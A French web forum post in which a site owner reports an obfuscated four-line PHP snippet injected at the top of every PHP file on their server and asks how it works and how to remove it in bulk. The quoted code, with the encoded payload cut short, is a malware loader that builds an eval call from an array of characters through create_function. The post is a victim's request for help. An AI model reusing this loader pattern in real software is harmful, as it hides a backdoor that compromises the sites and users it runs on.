-Max33- Le gang a-t-il fait bang? | Hello tout le monde !
J'ai remarqué il y a quelques jours sur mes fichiers PHP sur mon serveur, la présence d'un code supplémentaire, sur tous mes fichiers PHP.
Il s'agit d'un code de 4 lignes, situé sur les 4 toutes premières lignes de chaque page, seulement pour les pages PHP.
Donc déjà, j'ai beau regardé le code injecté, je ne le comprends pas trop, il ne ressemble pas vraiment à ce que je connais (pas d'eval ou de base64 par exemple).
Je vous le mets là, où certaines parties sont coupées par [...] car beaucoup trop longues.
Code :
- <?php
- $md5 = "f513374df2b627375dfdbce933886a64";
- $ac = array("i","n",'c','_','t','f',"r","l","(",'o',"d",'s',';','g','v',"a",')',"6","b",'$','z','e',"4" );
- $bc8 = create_function('$'.'v',$ac[21].$ac[14].$ac[15]. [..] .$ac[16].$ac[12]);
- $bc8('DZa3DqxYAkQ/Z96IAVn/nwp327XzPke/2n [...] AjfDnMaR1X7DxPGDTsJ+x2r9Q5CP4QiwEBmcDw/RLwzB8/o1X+d9/v333/8Hw==');
- ?>
|
Ce code est présent dans toutes les pages PHP, et pourtant il a l'air complètement invisible lorsqu'on exécute les pages. (pas de présence non plus dans le code source, ni dans la BDD MySQL - pas de changements)
Je n'ai absolument aucune idée de ce que ça fait
En tout cas, j'ai eu beau chercher sur tout le serveur, je n'ai pas trouvé de fichier php qui me serait inconnu. Je suis toujours à la recherche de la présence d'un PHP Shell.
Suite à ça, j'aurais deux questions :
- Quelqu'un a-t-il déjà vu ce genre de code ? Comment il fonctionnerait ?
- Le contenu de la variable $md5 et bc8() varie pour chaque page, ce qui m'empêche de les supprimer automatiquement via Search & Replace. Existe-t-il un moyen de détecter une partie du code dans les 4 premières lignes d'un fichier puis de supprimer automatiquement les 4 premières lignes ?
Merci d'avance ---------------
Le grand bleu avec une chaussette rouge.
|